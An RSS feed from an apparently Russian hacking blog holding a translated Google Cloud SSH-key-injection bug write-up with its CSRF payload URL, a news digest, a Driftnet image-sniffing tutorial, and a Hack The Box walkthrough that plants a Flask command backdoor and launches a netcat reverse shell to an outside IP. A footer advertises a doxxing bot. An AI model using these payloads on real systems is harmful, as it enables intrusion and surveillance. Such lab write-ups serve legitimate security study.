<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>the Matrix</title><generator>teletype.in</generator><description><![CDATA[the Matrix]]></description><image><url>https://img2.teletype.in/files/53/65/5365e996-9f72-41a5-91ea-f406ff91246a.png</url><title>the Matrix</title><link>https://teletype.in/@matrix_supp</link></image><link>https://teletype.in/@matrix_supp?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/matrix_supp?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/matrix_supp?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 05 Apr 2026 08:11:36 GMT</pubDate><lastBuildDate>Sun, 05 Apr 2026 08:11:36 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/fYmdCS_UCD4</guid><link>https://teletype.in/@matrix_supp/fYmdCS_UCD4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/fYmdCS_UCD4?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Как сделать инъекцию SSH ключа в Google Cloud Compute Engine</title><pubDate>Sun, 22 Jan 2023 08:09:56 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/5b/c9/5bc9d646-ceeb-470d-8051-b74d51fb4b85.png"></media:content><category>Утечки</category><description><![CDATA[<img src="https://img3.teletype.in/files/a8/8f/a88f3ac2-227a-4b71-86f7-922f9916b1e4.jpeg"></img>После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.]]></description><content:encoded><![CDATA[
  <figure id="z5Hk" class="m_original">
    <img src="https://img3.teletype.in/files/a8/8f/a88f3ac2-227a-4b71-86f7-922f9916b1e4.jpeg" width="800" />
  </figure>
  <p id="XyR7">После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.</p>
  <p id="Gkg7">Это были наши первые шаги в Google Cloud и мы, естественно, наткнулись на один из самых популярных продуктов — Compute Engine. Изучая его возможности и то, как он работает, я заметил <em>«SSH-in-browser». </em>Это функция в GCP, которая позволяет пользователям получать доступ к своим инстансам в браузере через SSH. Визуально этот интерфейс очень похож на Cloud Shell.</p>
  <figure id="7AQB" class="m_original">
    <img src="https://blog.stazot.com/content/images/2023/01/image.png" width="958" />
    <figcaption>SSH-консоль в браузере</figcaption>
  </figure>
  <p id="PMrK">Я рассматривал различные функции и опции SSH-in-browser и моё внимание привлекла возможность изменить имя пользователя<em>. </em></p>
  <figure id="GFKy" class="m_original">
    <img src="https://blog.stazot.com/content/images/2023/01/image-1.png" width="963" />
    <figcaption>Получение ввода имени пользователя от пользователя</figcaption>
  </figure>
  <p id="ZrJe">В этом диалоговом окне вводится имя пользователя, которое затем передается на сервер через GET параметр <code>newLinuxUsername</code>. Даже если указанное имя пользователя не существует, он создаст нового пользователя с указанным именем и зарегистрирует вас как этого пользователя.</p>
  <pre id="GFfQ">https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername={USERNAME}
</pre>
  <p id="t3Ga">Поскольку не было <em>никакого рандомного токена или защиты от CSRF</em>, любой мог создать ссылку и отправить ее пользователю Compute Engine, чтобы создать нового пользователя в его экземпляре. Не очень впечатляюще, но есть на что обратить внимание. Но самое интересное заключалось в том, что, по крайней мере, на первый взгляд, это выглядело так, как будто он просто принимал пользовательский ввод и передавал его в <code>useradd</code> или <code>adduser</code>.</p>
  <p id="OriS">Я попытался добавить полезные нагрузки, такие как <code>&#x60;whoami&#x60;</code>, <code>$(whoami)</code>, чтобы увидеть, будут ли они выполнены. Однако ничего не произошло. Чтобы проверить инъекцию команды второго порядка, я попробовал <code>&#x60;curl https://stazot.com&#x60;</code> в качестве полезной нагрузки. И снова ничего не произошло. Я вернулся на страницу инстанса Compute Engine и начал искать другие вещи.</p>
  <p id="agC0">Я заметил, что в разделе «Ключи SSH» были перечислены имена пользователей, которые я использовал в качестве полезной нагрузки. Этот раздел содержит список всех пользователей и их соответствующие добавленные или сгенерированные SSH-ключи. В то время как полезные нагрузки, такие как <code>&#x60;whoami&#x60;</code> были отображены как есть, полезная нагрузка <code>curl</code> была указана странным образом.</p>
  <figure id="L9tO" class="m_original">
    <img src="https://blog.stazot.com/content/images/2023/01/image-5.png" width="949" />
    <figcaption>SSH-ключи экземпляра</figcaption>
  </figure>
  <p id="4rex">Поле имени пользователя содержало <code>&#x60;curl http</code>, а поле SSH ключа содержало <code>stazot.com&#x60;:ssh-key-value</code> В тот же миг в моей голове зазвенели колокольчики.</p>
  <p id="hXTE">Сервер использовал символ двоеточия <code>:</code>в качестве разделителя. Всё, что до <code>:</code>считалось именем пользователя, а все после <code>:</code> считалось SSH-ключом для этого пользователя. Теоретически, это должно позволить злоумышленнику ввести имя пользователя и свой открытый SSH-ключ. Это возможно, потому что, как отмечалось ранее, сервер принимает этот ввод в GET запросе и не имеет защиты от CSRF.</p>
  <p id="0mfM">Таким образом, если заставить жертву открыть вредоносную ссылку, то добавится имя пользователя и SSH-ключ злоумышленника. Чтобы проверить уязвимость, я создал следующий URL-адрес с <code>attacker:{URL-ENCODED-SSH-PUBLIC-KEY}</code> в качестве полезной нагрузки:</p>
  <pre id="fSJX">https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}
</pre>
  <p id="sif4">Открыл ссылку как жертва — и попытался войти в инстанс как злоумышленник. Однако это не сработало. Причина заключалась в том, что добавленный мной SSH-ключ был добавлен к SSH-ключу, сгенерированному Google в серверной части. Чтобы исправить это, я добавил символы возврата строки к полезной нагрузке:</p>
  <pre id="Tv9d">https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}%0d%0a
</pre>
  <p id="m3qW">Как только жертва открыла эту ссылку, я попытался войти в этот инстанс как злоумышленник — и это сработало! Я вошел в систему на целевой машине с правами sudo.</p>
  <p id="6Dzc">Вот видео, демонстрирующее атаку:</p>
  <figure id="S5k9" class="m_custom">
    <iframe src="https://www.youtube-nocookie.com/embed/fOP-LwViRvA?autoplay=0&controls=1&wmode=opaque&rel=0&egm=0&iv_load_policy=3&hd=0"></iframe>
  </figure>
  <h3 id="E2Re">Почему существовала эта ошибка?</h3>
  <p id="XoSV">Это поведение существовало для облегчения авторизации через функцию SSH-in-browser. Поскольку браузер действует как SSH-клиент, для входа в инстанс ему требуется авторизованный SSH-ключ.</p>
  <p id="b0Ad">Compute Engine обрабатывает это, создавая SSH-ключ для каждого пользователя в экземпляре (который использует SSH-in-browser) и сохраняет его в метаданных. Когда пользователь входит в систему с помощью SSH-in-browser, инстанс извлекает все авторизованные SSH-ключи с сервера метаданных и регистрирует пользователя.</p>
  <p id="KfqO">Это очень сложный процесс, который подробно описан <a href="https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020#how-os-login-works" target="_blank">здесь</a>.</p>
  <blockquote id="NztL"><a href="https://blog.stazot.com/ssh-key-injection-google-cloud/" target="_blank">Оригинал на английском тут.</a></blockquote>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/5xSs6nwAOv5</guid><link>https://teletype.in/@matrix_supp/5xSs6nwAOv5?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/5xSs6nwAOv5?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Новости кибербеза #1</title><pubDate>Fri, 18 Nov 2022 23:43:30 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/a0/3a/a03a57da-37c5-44f7-b6a9-5771f7ce7211.png"></media:content><description><![CDATA[​🛡Как за $20 взломать сотни IT-компаний мира]]></description><content:encoded><![CDATA[
  <p id="je7Y">​<a href="tg://emoji?id=5818967120213445821&t=0" target="_blank">🛡</a><a href="https://telegra.ph/file/53f2430f4fd10bc18ad99.jpg" target="_blank">Как</a> за $20 взломать сотни IT-компаний мира</p>
  <p id="a9Qr">Исследователи из ИБ-компании Checkmarx выяснили подробности продолжающейся атаки на цепочку поставок, которая использует вредоносные PyPI-пакеты для распространения вредоносного ПО W4SP Stealer , и на сегодняшний день жертвами злоумышленников стали более 100 жертв. По словам эксперта Checkmarx Йоссефа Харуш, кибепреступник по-прежнему активен и выпускает новые вредоносные пакеты. Харуш назвал злоумышленника «WASP».</p>
  <p id="Zbps"><a href="https://telegra.ph/Kak-za-20-vzlomat-sotni-IT-kompanij-mira-11-18-3" target="_blank">🧑🏻‍💻Читать далее</a></p>
  <p id="CmOP"><a href="tg://emoji?id=5818967120213445821&t=1" target="_blank">🛡</a>В Госдуму внесли законопроект о конфискации имущества у киберпреступников</p>
  <p id="Lxt4">Законопроектом предлагается дополнить пункт «а» части 1 статьи 104.1 («Конфискация имущества») Уголовного кодекса РФ статьями 272—274.1. Это даст возможность конфисковывать имущество, полученное в результате неправомерного доступа к компьютерной информации (статья 272), создания, использования и распространения вредоносных программ (статья 273), нарушения правил эксплуатации, средств хранения, обработки или передачи компьютерной информации (статья 274) и неправомерного воздействия на критическую информационную инфраструктуру РФ (статья 274.1).</p>
  <p id="9tOB"><a href="https://telegra.ph/V-Gosdumu-vnesli-zakonoproekt-o-konfiskacii-imushchestva-u-kiberprestupnikov-11-18-4" target="_blank">📖Прочитать</a></p>
  <p id="8c58"><a href="tg://emoji?id=5818865088970362886&t=2" target="_blank">❕</a>МИД РФ предупредил о том, что мобильные устройства россиян могут прослушиваться на территории ЕС</p>
  <p id="X0zX">Иван Нечаев, замглавы департамента информации и печати Министерства иностранных дел РФ, во время общения с журналистами заявил, что мобильные устройства граждан России, которые на данный момент пребывают на территории Европейского союза, могут быть прослушаны третьими лицами, сообщают «Известия».</p>
  <p id="li6v"><a href="https://telegra.ph/MID-RF-predupredil-o-tom-chto-mobilnye-ustrojstva-rossiyan-mogut-proslushivatsya-na-territorii-ES-11-18" target="_blank">🧑🏻‍💻Подробности</a></p>
  <p id="PPVg"><a href="https://t.me/+xVHYNEkExnJiYjEy" target="_blank">𝚝𝚑𝚎 𝚖𝚊𝚝𝚛𝚒𝚡</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Perehvat-izobrazhenij-v-lokalnoj-seti-s-pomoshchyu-Driftnet-10-12</guid><link>https://teletype.in/@matrix_supp/Perehvat-izobrazhenij-v-lokalnoj-seti-s-pomoshchyu-Driftnet-10-12?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Perehvat-izobrazhenij-v-lokalnoj-seti-s-pomoshchyu-Driftnet-10-12?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Перехват изображений в локальной сети с помощью Driftnet</title><pubDate>Wed, 12 Oct 2022 09:10:40 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/ec/28/ec28c9b1-5c47-4217-9595-8baca63c4291.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/d9/49/d9496cee-a851-4e00-9356-f54206621596.png"></img>Мы уже рассказывали, как используя Wireshark перехватить трафик. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.]]></description><content:encoded><![CDATA[
  <figure id="coub">
    <img src="https://img2.teletype.in/files/d9/49/d9496cee-a851-4e00-9356-f54206621596.png" />
  </figure>
  <p id="FhDi">Мы уже рассказывали, <a href="https://spy-soft.net/capture-traffic-wireshark/" target="_blank">как используя Wireshark перехватить трафик</a>. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.</p>
  <p id="U1h3">Еще по теме: <a href="https://spy-soft.net/arp-harvesting-arp-cache-poisoning/" target="_blank">Сетевая разведка и перехват трафика с помощью ARP</a></p>
  <p id="Awnl">Driftnet – это инструмент, который может прослушивать сетевой трафик и перехватывать изображения из TCP потока. В новой бета версии добавлена возможность перехвата видео в формате MPEG и аудио в различных форматах.</p>
  <p id="Nszi">Но как Дрифтнет перехватывает эти изображения? Эти изображения передаются по сети без какого-либо шифрования. Следовательно, Driftnet может их перехватить.</p>
  <p id="Z0XQ"><strong>Перехват изображений в локальной сети с помощью Driftnet</strong></p>
  <p id="cWkp">Для этого урока нам понадобится любая программа, которая передает изображений по сети. Я буду использовать Netop Vision Pro. Как следует из названия, это ПО для управления классом, используемое для дистанционного обучения. Программа состоит из двух частей:</p>
  <ul id="ErZn">
    <li id="mikA">Модуль «Учитель»</li>
    <li id="fblL">Модуля «Студент»</li>
  </ul>
  <p id="COho">Модуль «Учитель» устанавливается на одну систему, а модуль «Ученик» — на всех контролируемых системах. Компьютер, на котором запущен модуль «Учитель», имеет полный контроль над компьютером, на котором запущен модуль «Ученик», а у ученика нет или очень ограниченная роль.</p>
  <p id="4PSs">Самая важная деталь – учитель может просматривать рабочий стол учащегося. Это функция нам нужна для перехвата изображений передаваемых по сети.</p>
  <p id="RDUS"><strong>Создание стенда для перехвата изображений</strong></p>
  <p id="eHpi">Для демонстрации работы Driftnet, нам понадобятся:</p>
  <ul id="RmeI">
    <li id="F1EM">Системы Windows с модулем Netop Vision. На одной будет установлен модуль Netop Vision Teacher, а на другой Student.</li>
    <li id="NOxO">Kali Linux, которая является атакующей системой и используется для перехвата изображений.</li>
  </ul>
  <h3 id="Установка-Netop-Vision-Student">Установка Netop Vision Student</h3>
  <p id="mEUe">Сначала настроим лабораторию. Скачаем и установим Netop Vision.</p>
  <p id="T2HG">После завершения установки, перезагрузим все компьютеры и добавим системы с установленным модулем «Ученик» в главный командующий модуль «Учитель»</p>
  <p id="YuuI">Теперь нам понадобиться Kali Linux. Вы можете <a href="https://spy-soft.net/kali-linux-live-usb-persistence/" target="_blank">установить Kali Linux на флешку</a> или использовать <a href="https://spy-soft.net/kali-linux-windows-10/" target="_blank">Kali Linux на Windows под WSL</a>.</p>
  <p id="0OML">Стенд готов.</p>
  <h3 id="Установка-и-использование-Driftnet-для-перехвата-изображения">Установка и использование Driftnet для перехвата изображения</h3>
  <p id="65MR">Теперь установим Driftnet на Kali Linux:</p>
  <p id="ZCOr">1sudo apt-get install driftnet</p>
  <p id="TM5d">Проверьте имя сетевого интерфейса.</p>
  <p id="0bbd">1ip a</p>
  <p id="Suhn">Теперь все, что нужно сделать, это запустить Driftnet на выбранном интерфейсе.</p>
  <p id="GCES">1sudo driftnet -i eth0</p>
  <p id="ex3Z">Откроется небольшое окно, как показано ниже.</p>
  <p id="1vK5">Снимки экрана компьютера получает модуль учителя, через регулярные короткие промежутки времени. Когда вы развернете окно, вы увидите передаваемые изображения рабочего стола ученика.</p>
  <figure id="kuQO">
    <img src="https://img4.teletype.in/files/72/43/7243932d-daa2-41de-aeb6-9be0339a8cb3.jpeg" />
    <figcaption>Захват изображений из сетевого трафика</figcaption>
  </figure>
  <p id="SzXm"><strong>Параметры и аргументы Driftnet:</strong></p>
  <ul id="IFp0">
    <li id="5TUN">-h – отображает справку.</li>
    <li id="Cx10">-b – сигнализирует при захвате нового изображения.</li>
    <li id="eWPg">-i – выбор интерфейса для прослушивания (по умолчанию используются все интерфейсы).</li>
    <li id="4FBa">-f файл – открывает сохраненные захваченные пакеты из дампа файла pcap.</li>
    <li id="tRoI">-a – не выводит изображения на экране, а только сохраняет их во временную директорию и отображает имена в стандартном выводе.</li>
    <li id="Mywj">-m количество – максимальное количество перехваченных изображений для хранения во временной директории в режиме-a.</li>
    <li id="0se4">-d директория – устанавливает временную директорию.</li>
    <li id="Gfqz">-x префикс – префикс для использования во время сохранения изображений.</li>
    <li id="rvcb">-s – вместе с изображениями пытаться извлечь потоковое аудио из сети.</li>
    <li id="8x9C">-S – перехватывает только потоковое аудио.</li>
  </ul>
  <p id="ArL6">На этом все. Вот так можно перехватить изображения в локальной сети.</p>
  <p id="kbs0"><strong>РЕКОМЕНДУЕМ:</strong></p>
  <ul id="fXMt">
    <li id="OhM4"><a href="https://spy-soft.net/intercept-traffic-with-http-toolkit/" target="_blank">Перехват трафика с помощью HTTP Toolkit</a></li>
    <li id="Du3X"><a href="https://spy-soft.net/stp-root-hijacking/" target="_blank">Использование STP Root Hijacking для перехвата трафика</a></li>
  </ul>
  <p id="qRbq"><a href="https://spy-soft.net/sniffing-images-in-network-driftnet/" target="_blank">Источник</a></p>
  <figure id="LH1L">
    <img src="https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png" />
  </figure>
  <p id="Hw9U"><strong>Наши проекты:</strong></p>
  <p id="xWeC">- Кибер новости: <a href="https://t.me/matrixleaked" target="_blank"><strong>the Matrix</strong></a><br />- Хакинг: <a href="https://t.me/+bby6PJAbqpNhOWZh" target="_blank"><strong>/me Hacker</strong></a><br />- Кодинг: <a href="https://t.me/+zBgEm0olmpxlMzA6" target="_blank"><strong>Minor Code</strong></a><br />👁 Пробить человека? Легко через нашего бота: <a href="https://t.me/iprobivator_bot" target="_blank"><strong>Мистер Пробиватор</strong></a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@matrix_supp/Vzlom-udalennogo-hosta-cherez-Git-i-privilegii-s-GTFO-Bins-10-11</guid><link>https://teletype.in/@matrix_supp/Vzlom-udalennogo-hosta-cherez-Git-i-privilegii-s-GTFO-Bins-10-11?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp</link><comments>https://teletype.in/@matrix_supp/Vzlom-udalennogo-hosta-cherez-Git-i-privilegii-s-GTFO-Bins-10-11?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=matrix_supp#comments</comments><dc:creator>matrix_supp</dc:creator><title>Взлом удаленного хоста через Git и привилегии с GTFOBins</title><pubDate>Tue, 11 Oct 2022 10:34:35 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/3b/5a/3b5ab1b0-7c5a-4b35-93ea-df9e83734287.png"></media:content><description><![CDATA[<img src="https://img2.teletype.in/files/56/bc/56bcb842-7ebc-479f-ba33-1c922dd7d978.png"></img>В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,]]></description><content:encoded><![CDATA[
  <figure id="z3qk">
    <img src="https://img2.teletype.in/files/56/bc/56bcb842-7ebc-479f-ba33-1c922dd7d978.png" />
  </figure>
  <p id="ZgTv">В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,</p>
  <p id="kNuv">Еще по теме: <a href="https://spy-soft.net/hack-wordpress/" target="_blank">Как взломать сайт WordPress</a><br />Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация. <strong>Взлом удаленного хоста через Git и привилегии с GTFOBins</strong></p>
  <p id="3FZm">Взлом веб-сервера на PHP</p>
  <p id="UgPq">Для начала до­бав­им IP-адрес машины в /etc/hosts:</p>
  <p id="IsAD">110.10.11.164 opensource.htb</p>
  <p id="gT06">Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.</p>
  <p id="Wq4R">Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:</p>
  <p id="XTHJ">123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &#x27;/&#x27; -f 1 | tr &#x27;\n&#x27; &#x27;,&#x27; | sed s/,$//)nmap -p$ports -A $1</p>
  <p id="LEx4">Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция—A)</p>
  <figure id="vaM8">
    <img src="https://img3.teletype.in/files/e2/44/e244451c-606a-4ce5-9201-911411ad41f2.png" />
    <figcaption>Результат работы скрипта</figcaption>
  </figure>
  <p id="YzNJ">Сканер смог найти только два откры­тых пор­та:</p>
  <ul id="Pit5">
    <li id="dyFM"><strong>22</strong> — служ­ба OpenSSH 7.6p1</li>
    <li id="bA9C"><strong>80</strong> — веб‑сер­вер Python Werkzeug 2.1.2; а</li>
  </ul>
  <p id="Ioic">Так­же филь­тру­ющийся порт 3000. Взглянем на веб-сервер.</p>
  <figure id="xL5j">
    <img src="https://img3.teletype.in/files/e0/c5/e0c57bb1-f87c-4c74-97f9-70ee0992f4af.png" />
    <figcaption>Глав­ная стра­ница HTB</figcaption>
  </figure>
  <p id="ZtLK">Находим ссыл­ку на фай­л. Исходя из названия можно догадаться, что это какой-то исходный код.</p>
  <figure id="X1ob">
    <img src="https://img4.teletype.in/files/b0/76/b0761e33-b56c-4ebc-b23b-9d3243d642cc.png" />
    <figcaption>Ска­чивание архива</figcaption>
  </figure>
  <p id="MDaF">В архи­ве лежит каталог .git, который стоит изучить.</p>
  <figure id="Xxfv">
    <img src="https://img4.teletype.in/files/b3/34/b3349630-82eb-43c0-8bb0-82d0184b7317.png" />
    <figcaption>Со­дер­жимое скаченного архи­ва</figcaption>
  </figure>
  <p id="y2gm">Рас­паковываем его и заходим в директорию, содер­жащую репози­торий Git. Пос­ле чего расмотрим сущес­тву­ющие вет­ки.</p>
  <p id="tkN8">1git branch</p>
  <figure id="Pwct">
    <img src="https://img2.teletype.in/files/17/27/1727062b-9ed7-4cbb-bced-5d2499b172e6.png" />
    <figcaption>Вет­ки Git-репози­тория</figcaption>
  </figure>
  <p id="38Ps">Далее получаем исто­рию ком­митов. Рассмотрим ее получше.</p>
  <p id="7aFT">1git log dev</p>
  <figure id="DUeG">
    <img src="https://img2.teletype.in/files/59/38/59383c7c-c11b-42e9-a94e-36e4777a5b00.png" />
    <figcaption>Ис­тория ком­митов Git</figcaption>
  </figure>
  <p id="Znbg">Те­перь прос­матри­ваем каж­дый ком­мит в надеж­де най­ти важ­ные дан­ные. И в одном из них обна­ружи­ваем URL прок­си‑сер­вера с ука­зан­ными учет­ными дан­ными.</p>
  <p id="GytT">1git show a76f8f75f7a4a12b706b0cf9c983796fa1985820</p>
  <figure id="oARy">
    <img src="https://img4.teletype.in/files/7e/5c/7e5cc08b-2f1d-4292-805c-9a531ba2a038.png" />
    <figcaption>Ком­мит с учет­ными дан­ными</figcaption>
  </figure>
  <p id="dj5M">Боль­ше в репози­тории ничего не находим, поэто­му начина­ем изу­чать исходный код при­ложе­ния.</p>
  <figure id="gl54">
    <img src="https://img3.teletype.in/files/ab/ad/abada3bd-0758-43dc-b0ae-7ab77d817a9f.png" />
    <figcaption>Со­дер­жимое фай­ла static/views.py</figcaption>
  </figure>
  <p id="j5Zg">Как видишь, мы можем заг­ружать фай­лы с любым рас­ширени­ем. Сра­зу бро­сает­ся в гла­за фун­кция os.path.join — стро­ка 14. Пос­ледова­тель­ность ../ филь­тру­ется, что не поз­волит записать свой SSH-ключ поль­зовате­лю, даже если мы узна­ем путь. Одна­ко файл сох­раня­ется с тем же име­нем без вся­ких вре­мен­ных меток, что дает нам воз­можность переза­писы­вать сущес­тву­ющие фай­лы.</p>
  <p id="Udcg">Точка опоры</p>
  <p id="xvEc">Да­вай поп­робу­ем переза­писать текущий файл, добавив в его конец свой обра­бот­чик, к при­меру /ralf.</p>
  <p id="nCDO">123@app.route(&#x27;/ralf&#x27;)def ralf(): return os.system(request.args.get(&#x27;cmd&#x27;))</p>
  <p id="uQXh">Ссыл­ку на стра­ницу для заг­рузки фай­ла най­дем чуть ниже кноп­ки ска­чива­ния репози­тория.</p>
  <figure id="k7CM">
    <img src="https://img1.teletype.in/files/8e/59/8e59a91b-b9f9-4855-a85f-0ad038d64fc7.png" />
    <figcaption>Фор­ма для заг­рузки фай­лов</figcaption>
  </figure>
  <p id="TvPX">Заг­рузим наш новый файл view.py и перех­ватим зап­рос на заг­рузку в Burp Intercept.</p>
  <figure id="8CUB">
    <img src="https://img3.teletype.in/files/22/7f/227f4801-7e81-476a-9a85-a5ffcc0a9de8.png" />
    <figcaption>Пе­рех­вачен­ный зап­рос на заг­рузку фай­ла</figcaption>
  </figure>
  <p id="VdHZ">Для переза­писи фай­ла изме­ним filename и вмес­то views.py запишем пол­ный путь к это­му фай­лу — /app/app/views.py.</p>
  <figure id="yHdQ">
    <img src="https://img1.teletype.in/files/8e/4f/8e4f1804-ed08-4c33-a587-0a167495f5b0.png" />
    <figcaption>Из­менен­ный зап­рос на заг­рузку фай­ла</figcaption>
  </figure>
  <p id="7M5L">Ког­да все будет готово, отпра­вим зап­рос даль­ше на сер­вер. На стра­нице получим сооб­щение, что заг­рузка прош­ла успешно.</p>
  <figure id="337E">
    <img src="https://img1.teletype.in/files/00/74/0074b771-cd33-4646-924c-ffaad39daa19.png" />
    <figcaption>Со­обще­ние об успешной заг­рузке фай­лов</figcaption>
  </figure>
  <p id="WY81">Те­перь мы можем выпол­нять коман­ды и сра­зу поп­робу­ем запус­тить реверс‑шелл:</p>
  <p id="NDC4">1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.49 4321 &gt;/tmp/f</p>
  <p id="wMdS">Я выпол­нял зап­рос через curl, поэто­му мне нуж­но было закоди­ровать реверс‑шелл в кодиров­ку URL. Burp Encoder закоди­рует абсо­лют­но все сим­волы, а не толь­ко спе­циаль­ные. Это не очень удоб­но, поэто­му я прос­то встав­ляю текст в Burp Repeater и кодирую ком­бинаци­ей кла­виш Ctrl-U. Одна­ко сго­дит­ся и любой дру­гой метод.</p>
  <p id="Kx63">1curl &#x27;http://opensource.htb/ralf?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.49 4321 &gt;/tmp/f&#x27;</p>
  <figure id="8lLM">
    <img src="https://img1.teletype.in/files/c1/9e/c19efe28-3013-4300-bd88-20bb026f998d.png" />
    <figcaption>Ис­ходная коман­да curl</figcaption>
  </figure>
  <p id="P7el">1curl &#x27;http://opensource.htb/ralf?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2&gt;%261|nc+10.10.14.49+4321+&gt;/tmp/f&#x27;</p>
  <figure id="nO8R">
    <img src="https://img4.teletype.in/files/f9/fa/f9fa7809-d320-4b56-b7c6-b2179056eb9e.png" />
    <figcaption>За­коди­рован­ная коман­да curl</figcaption>
  </figure>
  <p id="12al">Ос­талось коман­дойrlwrap -cAr nc -lnvp 4321 запус­тить лис­тенер и выпол­нить коман­ду для запус­ка реверс‑шел­ла.</p>
  <figure id="Q4OY">
    <img src="https://img2.teletype.in/files/d0/28/d0285bcf-388e-4b69-84ff-51d81a8063c0.png" />
    <figcaption>Сес­сия поль­зовате­ля</figcaption>
  </figure>
  <p id="0qRF">Продвижение</p>
  <p id="LwIl">По име­ни поль­зовате­ля понима­ем, что находим­ся внут­ри кон­тей­нера Docker. Даль­нейший путь прод­вижения дол­го искать не при­ходит­ся: вспо­мина­ем про филь­тра­цию под­клю­чений к пор­ту 3000. Сна­чала про­верим адрес докер‑машины, а потом уже поп­робу­ем под­клю­чить­ся к пор­ту 3000 хос­товой.</p>
  <figure id="1rBn">
    <img src="https://img1.teletype.in/files/86/44/8644d7a3-5ed7-4f10-beca-1d87d4ca0d0a.png" />
    <figcaption>Ре­зуль­тат выпол­нения коман­ды ifconfig</figcaption>
  </figure>
  <figure id="IDAL">
    <img src="https://img3.teletype.in/files/62/5d/625d387b-ed3b-4022-b332-b9e6bf7cdad5.png" />
    <figcaption>lОб­ращение к пор­ту 3000 с помощью curl</figcaption>
  </figure>
  <p id="4zlg">Для удоб­ной работы через бра­узер нам нуж­но тун­нелиро­вать тра­фик. Я буду исполь­зовать <strong>chisel</strong>, который нуж­но запус­тить как на локаль­ном хос­те, в качес­тве сер­вера, так и на уда­лен­ном — как кли­ент. В парамет­ре сер­верной час­ти ука­зыва­ем, что ожи­даем под­клю­чения (парамет­ры —reverse), а так­же порт для соз­дания тун­неля.</p>
  <p id="Oxrm">1chisel.bin server --reverse --port 8000</p>
  <figure id="0QBV">
    <img src="https://img2.teletype.in/files/92/fb/92fb54f9-72ce-4dd7-8df3-dd70263e1de1.png" />
    <figcaption>Ло­ги сер­верной час­ти</figcaption>
  </figure>
